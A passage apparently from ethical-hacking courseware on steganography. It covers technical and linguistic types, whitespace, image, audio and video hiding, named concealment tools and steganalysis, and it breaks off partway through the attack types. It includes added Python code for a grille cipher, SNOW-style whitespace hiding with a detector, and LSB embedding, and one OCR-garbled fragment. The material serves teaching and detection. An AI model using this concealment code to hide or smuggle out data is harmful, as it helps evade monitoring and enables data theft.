Some additional examples of NTFS stream detectors are listed as follows:

* Stream Detector (https://www.novirusthanks.org)
* GMER (http://www.gmer.net)
* ADS Manager (https://dmitrybrant.com)
* ADS Scanner (https://www.pointstone.com)
* Streams (https://docs.microsoft.com)

What is Steganography?

One of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? In a typical situation, after an attacker manages to infiltrate a firm as a temporary or contract employee, he/she surreptitiously seeks out sensitive information. While the organization may have a policy that does not allow removable electronic equipment in the facility, a determined attacker can still find ways to circumvent this by using techniques such as steganography.

Steganography refers to the art of hiding data "behind" other data without the knowledge of the victim. Thus, steganography hides the existence of a message. It replaces bits of unused data in ordinary files, such as graphics, sound, text, audio, and video, with other surreptitious bits. The hidden data can be in the form of plaintext or ciphertext, and sometimes, an image. Utilizing a graphic image as a cover is the most popular method to conceal the data in files. Unlike encryption, the detection of steganography can be challenging.

Thus, steganography techniques are widely used for malicious purposes. For example, attackers can hide a keylogger inside a legitimate image; thus, when the victim clicks on the image, the keylogger captures the victim's keystrokes. Attackers also use steganography to hide information when encryption is not feasible. In terms of security, it hides the file in an encrypted format, so that even if the attacker decrypts it, the message will remain hidden. Attackers can insert information such as source code for a hacking tool, a list of compromised servers, plans for future attacks, communication and coordination channels, etc.

Classification of Steganography

Based on its technique, steganography can be classified into two areas: technical and linguistic. In technical steganography, a message is hidden using scientific methods, whereas in linguistic steganography, it is hidden in a carrier, which is the medium used to communicate or transfer messages or files. This medium comprises the hidden message, carrier, and steganography key.

The following diagram depicts the classification of steganography.

Figure 6.133: Classification of steganography

Technical Steganography

Technical steganography uses physical or chemical methods, including invisible ink, microdots, and other means, to hide the existence of a message. It is difficult to categorize all the methods by which these goals are achieved, but some examples can be listed as follows:

* Invisible ink, or "security ink," is one of the methods of technical steganography. It is used for invisible writing with colorless liquids and can later be made visible by certain pre-negotiated manipulations such as lighting or heating. For example, if you use onion juice and milk to write a message, the writing will be invisible, but when heat is applied to the writing, it turns brown and the message therefore becomes visible.

Applications of invisible ink are as follows:

o Espionage
o Anti-counterfeiting
o Property marking
o Hand stamping for venue readmission
o Identification marking in manufacturing

* Microdots

A microdot is a text or an image considerably condensed in size (with the help of a reverse microscope), fitting up to one page in a single dot, to avoid detection by unintended recipients. Microdots are usually circular and about one millimeter in diameter but can be converted into different shapes and sizes.

* Computer-Based Methods

A computer-based method makes changes to digital carriers to embed information foreign to the native carriers. Communication of such information occurs in the form of text, binary files, disk and storage devices, and network traffic and protocols. It can alter software, speech, pictures, videos, or any other digitally represented code for transmission.
Computer-Based Steganography Techniques

Based on the cover modifications applied in the embedding process, steganography techniques can be classified into six groups, which are as follows:

* Substitution Techniques: In this technique, the attacker tries to encode secret information by substituting the insignificant bits with the secret message. If the receiver knows the places where the attacker embeds secret information, then he/she can extract the secret message.

* Transform Domain Techniques: The transform domain technique hides the information in significant parts of the cover image, such as cropping, compression, and some other image processing areas. This makes it more difficult to carry out
attacks. One can apply the transformations to blocks of images or over the entire image.

* Spread Spectrum Techniques: This technique is less susceptible to interception and jamming. In this technique, communication signals occupy more bandwidth than required to send the information. The sender increases the band spread by means of a code (independent of the data), and the receiver uses a synchronized reception code to recover the information from the spread spectrum data.

* Statistical Techniques: This technique utilizes the existence of "1-bit" steganography schemes by modifying the cover in such a way that, when transmission of a "1" occurs, some of the statistical characteristics change significantly. In other cases, the cover remains unchanged, to distinguish between the modified and unmodified covers. The theory of hypothesis testing from mathematical statistics helps in extraction.

* Distortion Techniques: In this technique, the user implements a sequence of modifications to the cover to obtain a stego-object. The sequence of modifications represents the transformation of a specific message. The decoding process in this technique requires knowledge about the original cover. The receiver of the message can measure the differences between the original cover and the received cover to reconstruct the sequence of modifications.

* Cover Generation Techniques: In this technique, digital objects are developed specifically to cover secret communication. When this information is encoded, it ensures the creation of a cover for secret communication.

Linguistic Steganography

This type of steganography hides the message in another carrier file. Further classification of linguistic steganography includes semagrams and open codes.

Semagrams

Semagrams involve a steganography technique that hides information with the help of signs or symbols. In this technique, the user embeds some objects or symbols in the data to change the appearance of the data to a predetermined meaning. The classification of semagrams is as follows:

o Visual Semagrams: This technique hides information in a drawing, letter, painting, music, or a symbol.

o Text Semagrams: A text semagram hides the text message by converting or transforming the appearance of the carrier text message, such as by changing font sizes and styles, adding extra spaces as whitespaces in the document, and including different flourishes in letters or handwritten text.
Open Codes

Open code hides the secret message in a legitimate carrier message specifically designed in a pattern on a document that is unclear to the average reader. The carrier message is sometimes also known as the overt communication, and the secret message
as the covert communication. The open-code technique consists of two main groups: jargon codes and covered ciphers.

* Jargon Codes: In this type of steganography, a certain language is used that can be understood by the particular group of people to whom it is addressed, while being meaningless to others. A jargon message is like a substitution cipher in many respects, but instead of replacing individual letters, the words themselves are changed. An example of a jargon code is "cue" code. A cue is a word that appears in the text and then transports the message.

* Covered Ciphers: This technique hides the message in a carrier medium visible to everyone. This type of message can be extracted by any person with knowledge of the method used to hide it. Further classification of covered ciphers includes null ciphers and grille ciphers.

o Null ciphers: A technique used to hide the message within a large amount of useless data. The original data are mixed with the unused data in any order (diagonally, horizontally, vertically, or in reverse) so that no one can understand it other than those who know the order.

o Grille ciphers: A technique used to encrypt plaintext by writing it onto a sheet of paper through a pierced (or stenciled) sheet of paper, cardboard, or any other similar material. In this technique, one can decipher the message using an identical grille. This system is thus difficult to crack and decipher, as only someone with the correct grille will be able to decipher the hidden message.
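The grille cipher just described, as an added example that is not code from the courseware: a grille is a fixed set of hole positions over a square grid, the sender writes the secret through the holes and covers every other cell with filler text, and the receiver lays the same grille over the grid and reads the holes in row order. The 5x5 GRILLE, the secret MEETATDAWN, the FILLER text and WRONG_GRILLE are constructed for the demonstration, and the function names are mine; decoding with a different grille yields only filler letters, which is the property the text relies on.

```python
"""Grille cipher (Cardan grille), the covered-cipher variant described above.

Added example, not code from the courseware. The grille, secret and filler
below are constructed for the demonstration.
"""
from typing import List, Sequence, Tuple

Hole = Tuple[int, int]                     # (row, column)
N = 5
# Constructed grille with 10 holes; the secret is written into them row by row.
GRILLE: List[Hole] = [(0, 1), (0, 3), (1, 0), (1, 4), (2, 2),
                      (3, 1), (3, 3), (4, 0), (4, 2), (4, 4)]
# A constructed grille with none of the right holes, to show a wrong key fails.
WRONG_GRILLE: List[Hole] = [(0, 0), (0, 2), (1, 1), (1, 3), (2, 0),
                            (2, 4), (3, 0), (3, 2), (4, 1), (4, 3)]
SECRET = "MEETATDAWN"
FILLER = "THEQUICKBROWNFOXJUMPS"          # needs at least N*N - len(GRILLE) letters


def grille_encode(secret: str, holes: Sequence[Hole], n: int, filler: str) -> List[str]:
    """Return the n x n grid (one string per row) with the secret under the holes."""
    if len(secret) > len(holes):
        raise ValueError("secret is longer than the grille has holes")
    if len(filler) < n * n - len(holes):
        raise ValueError("not enough filler text to cover the non-hole cells")
    hole_set = set(holes)
    secret_chars = iter(secret.ljust(len(holes), "X"))   # pad unused holes
    filler_chars = iter(filler)
    grid = []
    for r in range(n):
        # Scan row-major: holes take the next secret letter, other cells filler.
        row = "".join(next(secret_chars) if (r, c) in hole_set else next(filler_chars)
                      for c in range(n))
        grid.append(row)
    return grid


def grille_decode(grid: Sequence[str], holes: Sequence[Hole]) -> str:
    """Read the cells under the holes in row-major order with the same grille."""
    return "".join(grid[r][c] for r, c in sorted(holes))


if __name__ == "__main__":
    grid = grille_encode(SECRET, GRILLE, N, FILLER)
    print("\n".join(grid))
    print("right grille:", grille_decode(grid, GRILLE))
    print("wrong grille:", grille_decode(grid, WRONG_GRILLE))
```

The grid is what travels; the grille never does. Unused holes are padded with "X", so the receiver strips any trailing padding after decoding.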

Types of Steganography based on Cover Medium

Steganography is the art and science of writing hidden messages in such a way that no one other than the intended recipient knows of the existence of the message. The increasing use of electronic file formats with new technologies has made data hiding possible. Basic steganography can be broken down into two areas: data hiding and document making. Document making deals with protection against removal. Its further classifications include watermarking and fingerprinting.

The different types of steganography based on cover medium are as follows:

* Image Steganography: Images are the most popular cover objects used for steganography. In image steganography, the user hides the information in image files of different formats, such as .PNG, .JPG, and .BMP.

* Document Steganography: In document steganography, the user adds whitespaces and tabs at the ends of the lines.

* Folder Steganography: Folder steganography refers to hiding one or more files in a folder. In this process, the user moves the file physically, but it still stays associated with its original folder for recovery.

* Video Steganography: Video steganography is a technique to hide any kind of file with any extension in a carrying video file. One can apply video steganography to different formats of files, such as .AVI, .MPG4, .WMV, etc.

* Audio Steganography: In audio steganography, the user embeds the hidden messages in a digital sound format.

* Whitespace Steganography: In whitespace steganography, the user hides the messages in ASCII text by adding whitespaces to the end of lines.

* Web Steganography: In web steganography, a user hides web objects behind other objects and uploads them to a web server.

* Spam/Email Steganography: One can use spam emails for secret communication by embedding the secret messages in some way and hiding the embedded data in the spam emails. This technique is referred to as spam/email steganography.

* DVD-ROM Steganography: In DVD-ROM steganography, the user embeds the content in audio and graphical data.

* Natural Text Steganography: Natural text steganography is the process of converting sensitive information into user-definable free speech such as a play.

* Hidden OS Steganography: Hidden OS steganography is the process of hiding one OS in another.

* C++ Source-Code Steganography: In C++ source-code steganography, the user hides a set of tools in the files.

Whitespace Steganography

Whitespace steganography is used to conceal messages in ASCII text by adding whitespaces to the ends of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If built-in encryption is used, the message cannot be read even if it is detected.
* Snow

Source: http://www.darkside.com.au

Snow is a program for concealing messages in text files by appending tabs and spaces to the ends of lines, and for extracting messages from files containing hidden messages. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent 0s and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data.

As shown in the screenshot, attackers use the Snow tool to hide messages in a text file using the following command:

Synopsis: snow [-CQS] [-p passwd] [-l line-len] [-f file | -m message] [infile [outfile]]

Options:

-C: Compress the data if concealing, or uncompress it if extracting.

-Q: Quiet mode. If not set, the program reports statistics such as compression percentages and the amount of available storage space used.

-S: Report on the approximate amount of space available for a hidden message in the text file. Line length is valid, but other options are ignored.

-p password: If this is set, data encryption occurs with this password during concealment, or decryption during extraction.

-l line-length: When appending whitespaces, Snow will always produce lines shorter than this value. By default, the line length is 80.

-f message-file: The input text file will hide the contents of this file.

-m message-string: The input text file will hide the contents of this string. Note that, unless a new line is somehow included in the string, it will not appear in the extracted message.

Figure 6.134: Screenshot of Snow
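The encoding the Snow description above lays out (a marker tab, then up to seven spaces per 3-bit group, each group closed by a tab, lines kept under the 80-column default), as an added example that is not the Snow program and is not byte-compatible with it: encode() and decode() implement that scheme, capacity_bytes() shows why a short cover holds so little, and suspicious_lines() is the check a defender would run over a text file, since trailing whitespace is the one thing the technique cannot avoid leaving behind. COVER_TEXT and SECRET are constructed, and the function names are mine.

```python
"""SNOW-style whitespace steganography: encoder, decoder and a detector.

Added example, not the Snow program itself and not byte-compatible with it.
A tab marks the start of hidden data on a line; each 3-bit group is then
written as 0-7 spaces followed by a tab, so one group costs at most eight
columns. The cover text and secret below are constructed.
"""
from typing import List

LINE_LEN = 80                 # Snow's documented default maximum line length
COLS_PER_GROUP = 8            # up to seven spaces plus the terminating tab

# Constructed cover text and secret message.
COVER_TEXT = ["The quick brown fox", "jumps over", "the lazy dog"]
SECRET = b"Hi"


def _bits(data: bytes) -> str:
    return "".join(f"{b:08b}" for b in data)


def capacity_bytes(lines: List[str], line_len: int = LINE_LEN) -> int:
    """Whole bytes that fit if every line is padded up to line_len columns."""
    groups = sum(max((line_len - len(l) - 1) // COLS_PER_GROUP, 0) for l in lines)
    return groups * 3 // 8


def encode(lines: List[str], message: bytes, line_len: int = LINE_LEN) -> List[str]:
    """Append the message to the cover lines as trailing whitespace."""
    bits = _bits(message)
    bits += "0" * (-len(bits) % 3)                        # pad to whole 3-bit groups
    groups = [int(bits[i:i + 3], 2) for i in range(0, len(bits), 3)]
    out = []
    for line in lines:
        room = max((line_len - len(line) - 1) // COLS_PER_GROUP, 0)
        chunk, groups = groups[:room], groups[room:]
        if chunk:                                          # marker tab, then the groups
            line = line + "\t" + "".join(" " * g + "\t" for g in chunk)
        out.append(line)
    if groups:
        raise ValueError("cover text too short for the message")
    return out


def decode(lines: List[str]) -> bytes:
    """Read the 3-bit groups back from trailing whitespace; skip untouched lines."""
    bits = ""
    for line in lines:
        body = line.rstrip(" \t")
        trailing = line[len(body):]
        if not trailing.startswith("\t"):
            continue                                       # no start-of-data marker
        for seg in trailing[1:].split("\t")[:-1]:          # every group ends with a tab
            if len(seg) > 7 or seg.strip(" "):
                raise ValueError("malformed whitespace payload")
            bits += f"{len(seg):03b}"
    usable = len(bits) - len(bits) % 8                     # drop the padding bits
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def suspicious_lines(lines: List[str]) -> List[int]:
    """Defender's check: indexes of lines that end in spaces or tabs."""
    return [i for i, l in enumerate(lines) if l != l.rstrip(" \t")]


if __name__ == "__main__":
    stego = encode(COVER_TEXT, SECRET)
    print("capacity:", capacity_bytes(COVER_TEXT), "bytes")
    print("lines with trailing whitespace:", suspicious_lines(stego))
    print("recovered:", decode(stego))
```

The capacity figure is the practical limit of the technique: three of the 80-column lines above carry eight bytes, so a long message needs a long cover, and every line it touches ends in whitespace that an editor configured to show trailing spaces, or a pre-commit hook that rejects them, will expose.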

Image Steganography

Image steganography allows you to conceal your secret message within an image. You can exploit the redundant bits of the image to conceal your message within it. These redundant bits are those parts of the image that have very little effect on it if altered. The detection of this alteration is not easy. You can conceal your information within images of different formats (e.g., .PNG, .JPG, .BMP).

Images are popular "cover objects" used for steganography by replacing redundant bits of image data with the message, in such a way that human eyes cannot detect the effect. Image steganography is classified into two types: image domain and transform domain. In image domain (spatial) techniques, a user embeds the messages directly in the intensity of the pixels. In transform domain (frequency) techniques, first, the transformation of images occurs; then the user embeds the message in the image.

The following figure depicts the image steganography process and the role of steganography tools in the process.

[Figure: image steganography process]

Image File Steganography Techniques

* Least-Significant-Bit Insertion

The least-significant-bit insertion technique is the most commonly used technique of image steganography, in which the least significant bit (LSB) of each pixel helps hold secret data. The LSB is the rightmost bit of each pixel in an image. In the LSB insertion method, the binary data of the message are broken up and inserted into the LSB of each pixel in the image file in a deterministic sequence. Modifying the LSB does not result in a visible difference because the net change is minimal and can be indiscernible to the human eye. Thus, its detection is difficult.
Hiding the data:

o The stego tool makes a copy of an image palette with the help of the red, green, and blue (RGB) model.
o The LSB of each pixel's 8-bit binary number is substituted with one bit of the hidden message.
o A new RGB color in the copied palette is produced.
o With the new RGB color, the pixel is changed to an 8-bit binary number.

Suppose you have chosen a 24-bit image to hide your secret data, which you can represent in digital form as follows:

(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001)

Suppose you want to hide the letter "H" in the above 24-bit image. The system represents the letter "H" by the binary digits 01001000. To hide this "H," you can change the previous stream to:

Figure 6.136: Example of LSB insertion

You just need to replace the LSB of each pixel of the image file, as shown in the figure. To retrieve this H at the other side, the recipient combines the LSB image bits and is thus able to detect the H.
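The substitution above, as an added example that is not code from the courseware: COVER holds the nine colour bytes quoted in the text, embed_lsb() writes "H" (01001000) one bit per byte into the least significant bits, extract_lsb() reads it back the way the recipient does, and as_pixels() renders both streams in the text's (R G B) notation. Running it shows that only five of the nine bytes actually change, because three message bits already matched the cover's LSBs. The function names are mine.

```python
"""LSB insertion on the 24-bit pixel example quoted in the text.

Added example, not code from the courseware. COVER is the nine colour bytes
the text lists; the secret is the letter "H".
"""
from typing import List

# The three 24-bit pixels from the text, one byte per colour channel.
COVER = bytes([0b00100111, 0b11101001, 0b11001000,
               0b00100111, 0b11001000, 0b11101001,
               0b11001000, 0b00100111, 0b11101001])


def message_bits(message: bytes) -> List[int]:
    """Most significant bit first, as the text writes 'H' = 01001000."""
    return [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]


def embed_lsb(cover: bytes, message: bytes) -> bytes:
    """Replace the LSB of successive cover bytes with the message bits."""
    bits = message_bits(message)
    if len(bits) > len(cover):
        raise ValueError("cover has fewer bytes than the message has bits")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit           # clear the LSB, then set it
    return bytes(stego)


def extract_lsb(stego: bytes, length: int) -> bytes:
    """Recover `length` bytes by collecting one LSB per cover byte."""
    bits = [b & 1 for b in stego[: length * 8]]
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def bytes_changed(cover: bytes, stego: bytes) -> int:
    """How many bytes actually differ; bits that already matched cost nothing."""
    return sum(a != b for a, b in zip(cover, stego))


def as_pixels(data: bytes) -> str:
    """Render bytes as the (R G B) groups the text uses."""
    chunks = [f"{b:08b}" for b in data]
    return " ".join("(" + " ".join(chunks[i:i + 3]) + ")" for i in range(0, len(chunks), 3))


if __name__ == "__main__":
    stego = embed_lsb(COVER, b"H")
    print("cover:", as_pixels(COVER))
    print("stego:", as_pixels(stego))
    print(bytes_changed(COVER, stego), "of 9 bytes changed; recovered:", extract_lsb(stego, 1))
```

The receiver needs to know only the embedding order and the message length, which is the point the Substitution Techniques paragraph makes: anyone who knows where the bits went can read them, so the scheme hides the message's existence, not its content.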

* Masking and Filtering

Masking and filtering techniques exploit the limitations of human vision, which is incapable of detecting slight changes in images. Grayscale images and digital watermarks can hide information in a way similar to that of watermarks on paper. Masking allows you to conceal secret data by placing the data in an image file. You can use masking and filtering techniques on 24-bit-per-pixel and grayscale images. To hide secret messages, you must adjust the luminosity and opacity of the image. If the change in luminance is insignificant, then people other than the intended recipients will fail to notice that the image contains a hidden message. This technique can be easily applied as the image remains undisturbed. In most cases, users perform masking of JPEG images. Lossy JPEG images are relatively immune to cropping and compression image operations. Hence, you can hide your information in lossy JPEG images, often using the masking technique. If a message hides in significant areas of the picture, the steganography image encoded with a marking degrades at a lower rate under JPEG compression.

Masking techniques can be detected with simple statistical analysis but are resistant to lossy compression and image cropping. The information is not hidden in the noise but in the significant areas of the image.

* Algorithms and Transformation

The algorithms and transformation technique involves hiding secret information during image compression. In this technique, the user conceals the information by applying various compression algorithms and transformation functions. A compression algorithm and transformation uses a mathematical function to hide the coefficient of the least bit during image compression. The data are embedded in the cover image by changing the coefficients of a transformation of an image. Generally, JPEG images are the most suitable for compression, as they can function at different compression levels. This technique provides a high level of invisibility of secret data. JPEG images use a discrete cosine transform to achieve compression. There are three types of transformation used in the compression algorithm:

o Fast Fourier transformation
o Discrete cosine transformation
o Wavelet transformation
If the user embeds the information in the spatial domain of the LSB insertion technique, information hidden in the images can be vulnerable to attacks. An attacker can utilize simple signal-processing techniques and damage the information hidden in the image when using the LSB insertion technique. This may refer to the loss of information when the image undergoes certain processing techniques like compression. To overcome these problems, one can hide the information with frequency-domain-based techniques such as fast Fourier transformation, discrete cosine transformation, or wavelet transformation. Digital data are not continuous in the frequency domain. Analysis of the image data, to which frequency domain transformations are applied, becomes extremely challenging, which renders cryptanalysis attacks difficult to perform.

Image Steganography Tools

Image steganography tools detect hidden content in images in which the hidden data are inserted in redundant bits of data sources. You can use image files such as JPEG, GIF, BMP, and PNG to conceal your data.
* OpenStego

Source: https://www.openstego.com

OpenStego is a steganography application that provides the following functions:

o Data Hiding: It can hide any data within a cover file (e.g., images).
o Watermarking: Watermarking files (e.g., images) with an invisible signature. It can be used to detect unauthorized file copying.

Figure 6.137: Screenshot of OpenStego

Some examples of image steganography tools are as follows:

* QuickStego (http://quickcrypto.com)
* SSuite Picsel (https://www.ssuitesoft.com)
* CryptaPix (https://www.briggsoft.com)
* gifshuffle (http://www.darkside.com.au)
* PHP-Class StreamSteganography (https://www.phpclasses.org)

Document Steganography

Document steganography is the technique of hiding secret messages transferred in the form of documents. It includes the addition of whitespaces and tabs at the ends of lines. A stego document is a cover document comprising the hidden message. Steganography algorithms, referred to as the "stego system," are employed to hide the secret messages in the cover medium at the sender end. The same algorithm is used by the recipient to extract the hidden message from the stego-document.

The following diagram illustrates the document steganography process.

Figure 6.138: Document steganography process

Document Steganography Tools

Document steganography tools help in hiding files within documents, such as text or HTML files, using steganography methods.

* StegoStick

Source: https://sourceforge.net

StegoStick is a steganographic tool that allows attackers to hide any file in any other file. It is based on image, audio, or video steganography, which hides any file or message in an image (BMP, JPG, GIF, etc.), audio/video (MPG, WAV, etc.), or any other file format (PDF, EXE, CHM, etc.).

Figure 6.139: Screenshot of StegoStick

Some examples of document steganography tools are listed as follows:

* StegJ (http://stegj.sourceforge.net)
* Office XML (https://www.irongeek.com)
* SNOW (http://www.darkside.com.au)
* Data Stash (https://www.skyjuicesoftware.com)
* Texto (http://www.eberl.net)

Video Steganography

The image steganography discussed earlier can only hide a small amount of data inside image carrier files. Thus, image steganography can only be used when small amounts of data are to be hidden in the image files. However, one can use video steganography when it is necessary to hide large amounts of data inside carrier files.

Video steganography refers to the hiding of secret information in a carrier video file. The information is hidden in video files of different formats, such as .AVI, .MPG4, .WMV, etc. Discrete cosine transform (DCT) manipulation is used to add secret data at the time of the transformation process of the video.

Video files carry the secret information from one end to another. This ensures greater security of your secret information. Numerous secret messages can be hidden in video files as every frame consists of both images and sound. As the carrier video file is a moving stream of images and sound, it is difficult for the unintended recipient to notice the distortion in the video file caused by the secret message, and therefore, the message might go unobserved because of the continuous flow of the video. You can apply all the techniques available for image and audio steganography to video steganography.

The information hidden in video files is nearly impossible to be recognized by the human eye, as the change in pixel color is also negligible.

The following tools facilitate the hiding of secret information in running videos using video steganography:

* OmniHide Pro

Source: http://omnihide.com

OmniHide PRO allows you to hide any secret file within an innocuous image, video, music file, etc. The user can use or share the resultant stego file like a normal file without anyone knowing the hidden content; thus, this tool enables you to save your secret file from prying eyes. It also enables you to add a password to hide your file and enhance security.

Figure 6.140: Screenshot of OmniHide PRO

Some examples of video steganography tools are as follows:

* RT Steganography (https://rtstegvideo.sourceforge.net)
* StegoStick (https://sourceforge.net)
* OpenPuff (https://embeddedsw.net)
* MSU StegoVideo (http://www.compression.ru)

Audio Steganography

Audio steganography allows you to conceal a secret message within an audio file such as a WAV, AU, or even MP3 audio file. It embeds secret messages in audio files by slightly changing the binary sequence of the audio file. Changes in the audio file after insertion are not easily detectable, and in this way, the secret messages can be secured from prying ears.

The carrier audio file should not be allowed to be distorted to avoid detection of hidden messages. Therefore, one should embed the secret data in such a way that a slight change in the audio file can go unnoticed upon listening. One can hide information in an audio file by replacing the LSB or by using frequencies that are not audible to the human ear (>20,000 Hz).

Figure 6.141: Audio steganography process

Audio Steganography Methods

There are certain methods available to conceal your secret messages in audio files. Some methods implement an algorithm that relies on inserting secret information in the form of a noise signal, while other methods believe in exploiting sophisticated signal-processing techniques to hide information.

The following methods can be used to perform audio steganography to hide information:

* Echo Data Hiding

In the echo data hiding method, you can embed the secret information in the carrier audio signal by introducing an echo into it. Three parameters of the echo are used, namely initial amplitude, decay rate, and offset or delay, to hide the secret data. When the offset between the carrier signal and the echo decreases, they combine at a certain point of time at which the human ear cannot distinguish between the two signals. At this point, you can hear an echo as an added resonance to the original signal. However, this point of indistinguishable sounds depends on factors such as the quality of the original audio signal, type of sound, and listener acuity.

To encode the resultant signal into binary form, two different delay times are used. These delay times should be below the level of human perception. Parameters such as decay rate and initial amplitude should also be set below threshold audible values so that the audio cannot be heard.

* Spread Spectrum Method

This method uses two versions of the spread spectrum: direct-sequence spread spectrum (DSSS) and frequency-hopping spread spectrum (FHSS).

o Direct-Sequence Spread Spectrum (DSSS): DSSS is a frequency modulation technique where a communication device spreads a signal of low bandwidth over a broad frequency range to enable the sharing of a single channel between multiple users. The DSSS steganography technique transposes the secret messages in radio wave frequencies. DSSS does introduce some random noise to the signal.

o Frequency-Hopping Spread Spectrum (FHSS): In FHSS, the user alters the audio file's frequency spectrum so that it hops rapidly between frequencies. The spread spectrum method plays a significant role in secure communications, both commercial and military.

* LSB Coding

LSB encoding works similarly to the LSB insertion technique, in which users can insert a secret binary message in the least significant bit of each sampling point of the audio signal. This method allows one to hide enormous amounts of secret data. It is possible to use the last two significant bits to insert secret binary data, but at the risk of creating noise in the audio file. Its poor immunity to manipulation makes this method less adaptive. You can easily identify extra hidden data because of channel noise and resampling.

* Tone Insertion

This method involves embedding data in the audio signal by inserting low-power tones. These tones are not audible in the presence of significantly higher-power audio signals, and therefore the presence of the secret message is concealed. It is exceedingly difficult for an eavesdropper to detect the secret message from the audio signal. This method
ical andCountermensores
Mackin ©by E-Comel
Copyright
helpsto avoidattackssuchas low-passfiltering
and bit truncation. The audio
steganography
softwareimplements
one of theseaudio steganography methodsto
‘embed
thesecret datain the audiofiles.
Phase Encoding
Phase coding is described as the phase in which an initial audio segment is substituted by a reference phase that represents the data. It encodes the secret message bits as phase shifts in the phase spectrum of a digital signal, achieving a soft encoding in terms of the signal-to-noise ratio.
Audio Steganography Tools
There are many tools available on the market that can help to hide secret information in an audio file. The following are some examples of audio steganography tools to hide secret information in audio files.
• DeepSound
Source: http://jpinsoft.net
DeepSound allows you to hide any secret data in audio files (WAV and FLAC). It also allows you to extract secret files directly from audio CD tracks. In addition, it can encrypt secret files, thereby enhancing security.
Figure 6.142: Screenshot of DeepSound
Some examples of audio steganography tools are listed as follows:
• BitCrypt (http://bitcrypt.moshe-szweizer.com)
• StegoStick (https://sourceforge.net)
• MP3stego (https://www.petitcolas.net)
• QuickCrypto (http://www.quickcrypto.com)
• spectrology (https://github.com)
Folder Steganography
Folder steganography refers to hiding secret information in folders. Files are hidden and encrypted within a folder and are not seen by standard Windows applications, including Windows Explorer.
Folder Steganography Tools
Attackers use folder steganography tools to hide and secure folders and hide their confidential data. These tools secure folders using different encryption techniques.
• GiliSoft File Lock Pro
Source: http://www.gilisoft.com
GiliSoft File Lock Pro restricts access to files, folders, and drives by locking, hiding, or password-protecting them. Attackers can thus use this tool for these purposes. With this program, nobody can access or destroy the attacker's data without a password.
Figure 6.143: Screenshot of GiliSoft File Lock Pro
Some examples of folder steganography tools are listed as follows:
• Folder Lock (http://www.newsoftwares.net)
• Hide Folders 5 (https://fspro.net)
• Invisible Secrets 4 (http://www.invisiblesecrets.com)
• Max Folder Secure (https://maxpcsecure.com)
• QuickCrypto (http://www.quickcrypto.com)
Spam/Email Steganography
Spam/email steganography refers to the technique of sending secret messages by embedding them and hiding the embedded data in spam emails. Various military agencies supposedly use this technique with the help of steganography algorithms. You can use the Spam Mimic tool to hide a secret message in an email.
Spam/Email Steganography Tool
• Spam Mimic
Source: http://www.spammimic.com
Spam Mimic is spam "grammar" for a mimic engine by Peter Wayner. This encodes secret messages into innocent-looking spam emails. The encoder of this tool encodes the secret message as spam with a password, fake PGP, fake Russian, and space.
Figure 6.144: Screenshot of Spam Mimic showing the encoding process
Figure 6.145: Screenshot of Spam Mimic showing the encoded output
Steganography Tools for Mobile Phones
Earlier, we discussed a wide range of applications/tools that can be useful in hiding secret messages in various types of carrier media, such as images, audio, video, and text. These tools run on a variety of platforms of desktops or laptops only. However, there are also many mobile apps available that act as steganography tools for mobile phones. Mobile users can use these apps to send their secret messages.
Some steganography tools that run on mobile devices are as follows:
• Steganography Master
Source: https://play.google.com
Steganography Master helps in hiding secret messages inside a photo. You can encode your message in a picture, then save or send it to any mobile user. You can then decode the message only using the same app, but if you want to ensure that only the intended receiver reads the message, you can provide a password.
Figure 6.146: Screenshot of Steganography Master
• Stegais
Source: http://stegais.com
Stegais can hide a message in a selected image from the photo library or in a photo taken by the camera.
Figure 6.147: Screenshot of Stegais
Some additional steganography tools for mobile phones are as follows:
• SPYPIX (https://www.juicybitssoftware.com)
• Pixelknot: Hidden Messages (https://guardianproject.info)
• PocketStego (https://www.talixa.com)
• Steganography Image (https://play.google.com)
• Steganography (https://github.com)
Steganalysis
Steganalysis is the process of discovering the existence of hidden information in a medium. It is the reverse process of steganography. It is an attack on information security in which the attacker, referred to here as a steganalyst, tries to detect the hidden messages embedded in images, text, audio, and video carrier mediums using steganography. Steganalysis determines the encoded hidden message and, if possible, recovers the message. It can detect the message by looking at variances between bit patterns and unusually large file sizes.
Steganalysis has two aspects: the detection and distortion of messages. In the detection phase, the analyst observes the relationships between the steganography tools, stego-media, cover, and message. In the distortion phase, the analyst manipulates the stego-media to extract the embedded message and decides whether it is useless and should be removed altogether.
The first step in steganalysis is to discover a suspicious image that may be harboring a message. This is an attack on the hidden information. There are two other types of attacks against steganography: message and chosen-message attacks. In the former, the steganalyst has a known hidden message in the corresponding stego-image. The steganalyst determines patterns that arise from hiding and detecting this message. The steganalyst creates a message using a known stego tool and analyzes the differences in patterns. In a chosen-message attack, the attacker creates steganography media using the known message and steganography tool (or algorithm).
Cover images disclose more visual clues than stego-images. It is necessary to analyze stego-images to identify the concealed information. The gap between the cover image and stego-image file size is the simplest evident signature. Many signatures use some of the color schemes of the cover image.
Once detected, an attacker can destroy a stego-image or modify the hidden messages. It is particularly important to understand the overall structure of the technology and methods to detect the hidden information for uncovering the activities.
Some challenges of steganalysis are as follows:
• The suspect information stream may or may not have encoded hidden data
• Efficient and accurate detection of hidden content within digital images is difficult
• The message might have been encrypted before being inserted into a file or signal
• Some of the suspect files or signals may have irrelevant data or noise encoded into them
Methods/Attacks on Steganography
Steganography attacks work according to the type of information available for the steganalyst to perform steganalysis on. This information may include a hidden message, carrier (cover) medium, stego-object, steganography tools, or algorithms used for hiding information. Thus, the classification of steganalysis includes the following types of attacks: stego-only, known-stego, known-message, known-cover, chosen-message, chosen-stego, chi-square, distinguishing statistical, and blind classifier.
• Stego-only attack
In a stego-only attack, the steganalyst or attacker does not have access to any information except the stego-medium or stego-object. In this attack, the steganalyst must try every possible steganography algorithm and related attack to recover the hidden information.
• Known-stego attack
